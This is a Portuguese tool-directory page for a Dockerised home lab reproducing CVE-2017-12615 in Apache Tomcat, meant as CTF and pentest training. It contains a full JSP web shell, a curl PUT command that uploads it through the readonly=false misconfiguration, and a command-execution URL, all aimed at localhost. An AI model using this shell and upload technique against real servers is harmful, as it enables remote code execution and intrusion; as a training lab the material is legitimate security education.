Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: Execução Remota de Código via Upload de JSP - Laboratório Caseiro para Red Teaming, Testes de Penetração | Kitploit
Ferramentas/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Execução Remota de Código via Upload de JSP - Laboratório Caseiro para Red Teaming, Testes de Penetração

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

INGLÊS ABAIXO

CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP

image

Este laboratório simula a vulnerabilidade CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP
Ocorre devido à configuração readonly=false, que permite o upload de arquivos via HTTP PUT, incluindo arquivos .jsp que podem executar comandos (RCE).


image

Funcionalidades

  • Apache Tomcat 7.0.79 (vulnerável)
  • Sobrescrita do DefaultServlet com readonly=false
  • Possibilidade de usar PUT Upload para colocar arquivos .jsp no diretório web ROOT
  • Suporte à execução de comandos via web shell
  • Página web com estilo industrial e nota interna que foi esquecida (dica)
  • Sistema que gera flag_RANDOM.txt automaticamente toda vez que o container é iniciado
  • Projetado para CTF / Red Team / Pentest Training

Estrutura de Diretórios

root@kitploit:~
/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

Como Usar (Executar Container)

root@kitploit:~
docker compose build
docker compose up -d

Abra o navegador:

root@kitploit:~
http://localhost:8080/

Como Testar a Vulnerabilidade CVE-2017-12615

1) Criar um payload JSP

root@kitploit:~
cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) Fazer upload do arquivo com PUT (deve ter / no final do nome do arquivo)

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) Executar o webshell

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

Flag

Armazenada em:

root@kitploit:~
/tmp/flag_RANDOM.txt

Versão em Inglês — CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP

Este laboratório simula CVE-2017-12615 Tomcat: Execução Remota de Código via Upload JSP, no qual o DefaultServlet do Apache Tomcat está mal configurado com:

root@kitploit:~
readonly=false

Isso permite que atacantes façam upload de arquivos .jsp via HTTP PUT, possibilitando execução remota de código.


image

Funcionalidades

  • Apache Tomcat 7.0.79 vulnerável
  • Sobrescrita do DefaultServlet com readonly=false
  • PUT Upload → escrever arquivos .jsp arbitrários no diretório web ROOT
  • Suporte à execução de comandos via shell JSP
  • Página inicial com estilo industrial e uma dica interna sutil
  • flag_RANDOM.txt gerada automaticamente na inicialização do container
  • Adequado para CTF, pesquisa e desenvolvimento de exploits

Exemplo de Exploração

Fazer upload de um shell JSP

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

Executar comandos

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

Localização da Flag

root@kitploit:~
/tmp/flag_RANDOM.txt

Aviso

Apenas para fins educacionais, de pesquisa e testes de penetração autorizados.

Baixar ferramenta